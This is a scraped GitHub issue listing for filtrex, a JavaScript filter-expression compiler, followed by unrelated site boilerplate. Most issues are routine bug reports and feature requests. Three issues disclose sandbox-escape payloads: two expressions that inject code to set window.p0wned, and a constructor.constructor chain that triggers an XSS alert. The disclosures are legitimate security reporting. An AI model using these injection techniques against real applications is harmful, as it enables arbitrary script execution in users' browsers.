joewalnes / filtrex Goto Github PK
View Code? Open in Web Editor NEWA simple, safe, JavaScript Filter Expression compiler for end-users
License: MIT License
A simple, safe, JavaScript Filter Expression compiler for end-users
License: MIT License
This will p0wn your browser.
compileExpression("'undefined:(window.p0wned=true)));((true?(x=>x)'()")()
Hi,
We are trying to consume filtrex.js in java using javax.script (nashorn).
And while it is loading the filterx.js file, it is giving some syntax error as mentioned below.
javax.script.ScriptException: :115:17 Expected an operand but found error
`yytext = JSON.stringify(yytext);
^ in at line number 115 at column number
Please let us know.
filtrex has a global name collision with requirejs's require. Can we please rename all references to require?
I'd like to use this to match text, like someone would with a search engine, e.g.
e.g If I had the text
this is a test of the system
brad and his dog
this search would match
test or you and (brad and dog)
but this one wouldnt
test and rabbit
I could use a custom function, but for this use case, the variable names are actually the variable values.
Is there an easy way to do this? I'd prefer not to use a custom function, as I want it to be natural for my end users.
Filtrex seems to be vulnerable to cross site scripting. For example, in the highlighting example (http://rawgit.com/joewalnes/filtrex/master/example/highlight.html), if one enters the following string in the text input, an alert dialog appears:
constructor.constructor.name.replace("",constructor.constructor("alert('xss')"))
This is because Filtrex does not restrict the user-supplied functions only to own members of the functions object (abs, ceil, floor...), but allows accessing function members inherited from Object.prototype as well - for example, constructor, i.e. the Object() function. It's also possible to call functions in nested objects as well, such as constructor.constructor i.e. the Function() function.
The above was tested and worked on Firefox 29.0.1 (OS X 10.7) and Chrome 34.0 (OS X 10.7)
Strings (surrounding with double quotes) in filtrex expressions cannot contain any double quote characters themselves.
I'll open a PR to address this.
const expression = 'answer.index > 1 ? "Yes" : "No"';
const myfilter = filtrex(expression);
// Execute function
console.log(myfilter({ answer: { index: 2 } })); // returns "No"
Apparently, @joewalnes lost his interest in this package, and since I'm the only one reacting to issues here for some time now, I decided to continue the development on my fork of Filtrex. If you have any suggestions, ideas or questions, feel free to start an issue there.
I also started a dispute in order to aquire the NPM package filtrex, so that I'd be able to update it. Since then, you can use my package @m93a/filtrex which is up to date and includes several cool features and security fixes.
This will p0wn your browser.
compileExpression(`'"+(window.p0wned=true)+"'`)({});
I need your library for parsing expressions but I saw that it only supports numbers and strings.
Is it possible to somehow allow date manipulation?
The expression I need to parse is:
'31.07.' + (myDate.getMonth() <= 7 ? myDate.getFullYear() + 3: myDate.getFullYear() + 4 )
Im trying to get this to parse expressions with spaces e.g. Net Income > 10000. I have tried a few things like wrapping with quotes "Net Income" but that hasn't worked. Any ideas?
(Stolen from: https://github.com/mdo/wtf-forms/issues/5)
Joe I like this tool!
I ran this unit test, which is similar to your existing unit test. It always returns false/0
'filtrex: object string test': function(test) {
test.equal(1, compileExpression('obj.foo == "hello"')({obj:{foo:'hello'}}));
test.equal(0, compileExpression('obj.foo == "hello"')({obj:{foo:'bye'}}));
test.equal(0, compileExpression('obj.foo != "hello"')({obj:{foo:'hello'}}));
test.equal(1, compileExpression('obj.foo != "hello"')({obj:{foo:'bye'}}));
test.equal(true, compileExpression('obj.foo in ("aa", "bb")')({obj:{foo:'aa'}}));
test.equal(false, compileExpression('obj.foo in ("aa", "bb")')({obj:{foo:'c'}}));
test.equal(false, compileExpression('obj.foo not in ("aa", "bb")')({obj:{foo:'aa'}}));
test.equal(true, compileExpression('obj.foo not in ("aa", "bb")')({obj:{foo:'cc'}}));
}
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.